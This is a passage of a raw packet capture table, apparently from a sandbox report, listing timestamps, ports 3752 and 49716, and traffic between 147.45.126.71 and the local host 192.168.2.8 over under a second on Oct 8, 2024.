Oct 8, 2024 20:52:32.291706085 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291718960 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291732073 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291745901 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291759014 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291872978 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291882038 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.291956902 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291970968 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291973114 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.292052984 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.292068005 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.292088032 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.292103052 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.292114973 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.292135954 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.292296886 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.376208067 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376302004 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376317024 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376364946 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.376451015 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376465082 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376502037 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376514912 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376529932 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376543999 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376558065 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376708984 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376718998 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.376723051 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376733065 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.376738071 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376832962 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.376843929 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376857996 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376871109 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376883984 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376897097 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376910925 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376931906 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376944065 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376957893 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376971960 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.376987934 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377001047 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377015114 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377078056 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377090931 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377099037 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.377104998 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377115965 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377156973 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377172947 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377188921 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377203941 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377218008 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.377285004 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377298117 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377312899 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377325058 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377337933 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377351046 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377365112 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377377987 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377392054 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377428055 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377441883 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377454996 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377468109 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377477884 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.377481937 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377495050 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377507925 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377826929 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377847910 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377860069 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.377870083 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377885103 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377897024 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377911091 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377923012 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377937078 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377949953 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377950907 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.377958059 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377979040 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377995014 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.377999067 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.378009081 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378022909 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378036976 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378051043 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378068924 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378082037 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378097057 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378112078 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378125906 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378139973 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378151894 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378170013 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378241062 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.378266096 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378278971 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378292084 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378304958 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378319025 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378331900 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378345013 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378357887 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378371954 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378382921 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378545046 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378557920 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378562927 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.378571987 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378660917 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378674984 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378683090 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378696918 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378710032 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378725052 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378737926 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378752947 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378761053 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.378767014 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378781080 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378796101 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378809929 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378866911 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378880024 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378979921 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.378993988 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.379007101 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.379019976 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.379040956 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.379076004 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.379089117 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.379103899 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.379117966 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.379131079 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.379228115 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.379240990 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.379249096 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.379255056 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.379267931 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.379281998 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.379295111 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.379376888 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.379688978 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.464696884 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.464725971 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.464740038 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.464755058 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.464762926 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.464771032 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.464786053 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.464807034 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.464822054 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.464837074 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.464852095 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.464864016 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.464878082 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.464899063 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.464911938 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.464931011 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.464943886 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.464958906 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.464972019 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.464986086 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465002060 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465085030 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.465085030 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.465092897 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465106964 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465118885 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465133905 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465147018 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465161085 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465174913 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465190887 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465287924 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465301991 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465315104 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465316057 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.465328932 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465341091 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465353966 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465365887 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465393066 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465409040 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465424061 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465439081 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465451002 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465465069 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465490103 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465503931 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465517044 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465528011 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.465528011 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.465531111 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465641022 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465652943 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465667009 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465681076 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465693951 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465707064 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465719938 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465734959 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465802908 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465816021 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465830088 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465837955 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465845108 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.465846062 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465854883 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465862989 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465869904 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465902090 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465903997 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.465929985 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465943098 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465955973 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.465989113 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466002941 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466017008 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466029882 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466104031 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466115952 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466130018 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466141939 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466145039 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.466145039 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.466156006 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466178894 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466192961 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466206074 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466218948 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466232061 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466244936 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466259003 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466332912 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466346025 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466358900 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466372967 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466386080 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466398954 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466414928 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466427088 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.466429949 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466456890 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466470957 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466485023 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466496944 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466510057 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.466510057 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.466511965 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466526031 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466540098 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466618061 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466619015 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.466619015 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.466631889 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466725111 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466738939 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466753006 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466773033 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466785908 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466799974 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466814995 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466828108 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466842890 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466857910 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466870070 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.466872931 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.466897964 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.466916084 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.551369905 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.551441908 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.551492929 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.551506996 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.551508904 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.551548958 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.551563025 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.551563025 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.551676035 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.551678896 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.551687956 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.551702976 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.551767111 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.551775932 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.551780939 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.551795006 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.551808119 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.551822901 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.551829100 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.551836967 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.551843882 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.551848888 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.551860094 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.551908970 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.551999092 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552011013 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552023888 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552061081 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.552068949 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552082062 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552095890 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552109003 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552123070 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552136898 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552150965 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552164078 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552177906 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552190065 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552203894 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552211046 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.552228928 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552242041 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552257061 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552268982 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552274942 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.552274942 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.552284956 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552300930 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552314997 CEST	3752	49716	147.45.126.71	192.168.2.8
